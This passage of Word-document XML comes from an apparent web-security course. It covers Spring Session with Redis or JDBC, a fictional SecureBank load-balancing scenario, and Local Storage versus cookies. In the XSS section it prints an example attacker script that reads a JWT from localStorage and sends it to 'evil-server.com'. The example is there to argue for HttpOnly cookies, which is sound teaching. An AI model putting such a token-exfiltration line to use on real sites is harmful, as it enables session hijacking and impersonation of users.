              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="991B1B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🚨  Production Security Requirement</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Always set all three security flags in production: HttpOnly=true (prevents JavaScript from stealing your session cookie), Secure=true (prevents the cookie from being sent over unencrypted HTTP), and SameSite=Strict (prevents the cookie from being sent on cross-site requests, blocking CSRF attacks). Omitting any of these is a security vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Spring Session — Enterprise-Grade Session Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The default in-memory session storage works perfectly for a single server. But modern applications are deployed on multiple server instances behind a load balancer. Spring Session solves the distributed session problem by externalizing session storage to a shared data store, most commonly Redis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding Spring Session with Redis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 — Add dependencies to pom.xml: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&lt;dependency&gt;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&lt;groupId&gt;org.springframework.session&lt;/groupId&gt;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&lt;artifactId&gt;spring-session-data-redis&lt;/artifactId&gt;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&lt;/dependency&gt;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&lt;dependency&gt;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&lt;groupId&gt;org.springframework.boot&lt;/groupId&gt;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&lt;artifactId&gt;spring-boot-starter-data-redis&lt;/artifactId&gt;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&lt;/dependency&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 — Configure in application.properties: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Tell Spring to use Redis for session storage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spring.session.store-type=redis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Redis connection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spring.data.redis.host=redis.securebank.internal</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spring.data.redis.port=6379</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spring.data.redis.password=${REDIS_PASSWORD}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Session timeout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spring.session.timeout=30m</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Namespace for session keys in Redis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spring.session.redis.namespace=spring:session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 — Enable Redis sessions in your main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@SpringBootApplication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@EnableRedisHttpSession  // This single annotation changes everything</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public class BankingApplication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public static void main(String[] args)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SpringApplication.run(BankingApplication.class, args);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thick" w:color="166534" w:sz="16"/>
              <w:bottom w:val="single" w:color="166534" w:sz="6"/>
              <w:right w:val="single" w:color="166534" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCFCE7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="166534"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">✅  Zero Code Changes Required</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Your application code does NOT change at all. Every session.setAttribute(), session.getAttribute(), and session.invalidate() call in your controllers works exactly the same way. Spring Session transparently intercepts these calls and routes them to Redis instead of the JVM heap. This is the power of Spring's abstraction model.</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What Spring Session Stores in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Redis Key:</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spring:session:sessions:a7f3b2c9-d1e4-f5a6-b7c8-d9e0f1a2b3c4</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Redis Value (Hash):</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"sessionAttr:userId":   "42",</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"sessionAttr:username": "john_doe",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"sessionAttr:role":     "CUSTOMER",</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"creationTime":         "1700000000000",</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"lastAccessedTime":     "1700001800000",</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"maxInactiveInterval":  "1800"</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Spring Session with JDBC (Alternative to Redis)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If Redis is not available in your infrastructure, Spring Session can also store sessions in your relational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Dependencies: spring-session-jdbc</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application.properties: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spring.session.store-type=jdbc</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Spring Session automatically creates the SPRING_SESSION table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and SPRING_SESSION_ATTRIBUTES table in your database.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Session lookups are SQL queries — slower than Redis but no extra infrastructure.</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Real-World Project Scenario: SecureBank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thick" w:color="166534" w:sz="16"/>
              <w:bottom w:val="single" w:color="166534" w:sz="6"/>
              <w:right w:val="single" w:color="166534" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCFCE7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="166534"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🏦  Real-World Project Scenario</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Business Problem: SecureBank Online deploys 5 instances of their banking application behind AWS ELB (Elastic Load Balancer) for high availability. When a customer logs in, they are authenticated on Instance #3. But the next request goes to Instance #1. Without shared session storage, the customer appears to be logged out — every click requires re-authentication. This is completely unacceptable for a banking application.
Solution: Spring Session with Redis Cluster. All 5 instances connect to a shared Redis cluster. When the customer logs in on Instance #3, their session is written to Redis. When Instance #1 receives their next request, it reads from the same Redis cluster and recognizes the customer. The customer never notices — seamless experience.
Result: The bank can scale from 5 to 50 instances in minutes during peak periods (e.g., payroll days) without any session disruption.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 4: Local Storage — Client-Side State</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Not all state needs to live on the server. The browser provides several mechanisms for storing data on the client side. The most powerful of these is Local Storage — a simple key-value store built into every modern browser. Understanding Local Storage is essential for modern web development, and more importantly, understanding its security limitations is critical for building safe applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 What Is Local Storage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Storage is a JavaScript API that allows web applications to store data directly in the user's browser. Think of it as a dedicated hard drive partition for a specific website. Data stored in Local Storage persists even when the browser is closed and reopened.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thick" w:color="1E40AF" w:sz="16"/>
              <w:bottom w:val="single" w:color="1E40AF" w:sz="6"/>
              <w:right w:val="single" w:color="1E40AF" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DBEAFE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E40AF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">💡  Analogy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The Personal Drawer Analogy: Local Storage is like a locked drawer at your desk at work. You keep things you need for your work — notes, reference materials. When you come back the next day, everything is still there. Only you can access your drawer. However, if a thief sneaks a key-copying device onto your lock (equivalent to an XSS attack), they can now read everything in your drawer.</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Using Local Storage in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STORE data</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localStorage.setItem('theme', 'dark');</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localStorage.setItem('language', 'en-US');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localStorage.setItem('cartItems', JSON.stringify([</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id: 1, name: 'Laptop', qty: 1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id: 2, name: 'Mouse',  qty: 2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RETRIEVE data</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const theme = localStorage.getItem('theme');         // 'dark'</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const cart  = JSON.parse(localStorage.getItem('cartItems')); // Array</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REMOVE specific item</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localStorage.removeItem('theme');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CLEAR everything for this domain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localStorage.clear();</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Comparing Client-Side Storage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2267"/>
        <w:gridCol w:w="2267"/>
        <w:gridCol w:w="2266"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Local Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Session Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2266"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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Forever (until cleared)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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Until tab closes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="226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Until expiry date</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Storage limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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~5–10 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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~5–10 MB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="226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~4 KB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Sent with requests?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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No — never</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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No — never</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="226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Automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Readable by JS?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="226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(unless HttpOnly)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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XSS vulnerable?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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YES — critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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YES — critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="226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Mitigated (HttpOnly)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CSRF risk?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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No (not sent auto)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="226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Yes (sent automatically)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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Origin (domain)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2267"/>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Tab + origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="226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Domain + path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 The XSS Attack — Why Local Storage Is Risky for Tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS (Cross-Site Scripting) is when an attacker injects malicious JavaScript into your web page — for example, through a poorly sanitized user comment or a compromised third-party library. If your JWT token is stored in Local Storage, this attack can silently steal it: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Attacker's injected script (invisible to the user):</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const stolenToken = localStorage.getItem('authToken');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fetch('https://evil-server.com/steal?t=' + stolenToken);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Token is now in the attacker's hands.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They can impersonate the user completely.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thick" w:color="166534" w:sz="16"/>
              <w:bottom w:val="single" w:color="166534" w:sz="6"/>
              <w:right w:val="single" w:color="166534" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCFCE7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="166534"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">✅  Security Recommendation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The Recommendation: Store JWT authentication tokens in HttpOnly cookies, NOT in Local Storage. An HttpOnly cookie cannot be read by any JavaScript — not your code, not an attacker's injected code. This completely eliminates the XSS token theft attack. The trade-off is that HttpOnly cookies require CSRF protection (handled by Spring Security).</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What IS Safe to Store in Local Storage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">User interface preferences: dark mode, font size, sidebar collapsed/expanded</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Non-sensitive draft content: text a user is composing but hasn't submitted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Non-sensitive cached data to improve performance: product categories, public configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
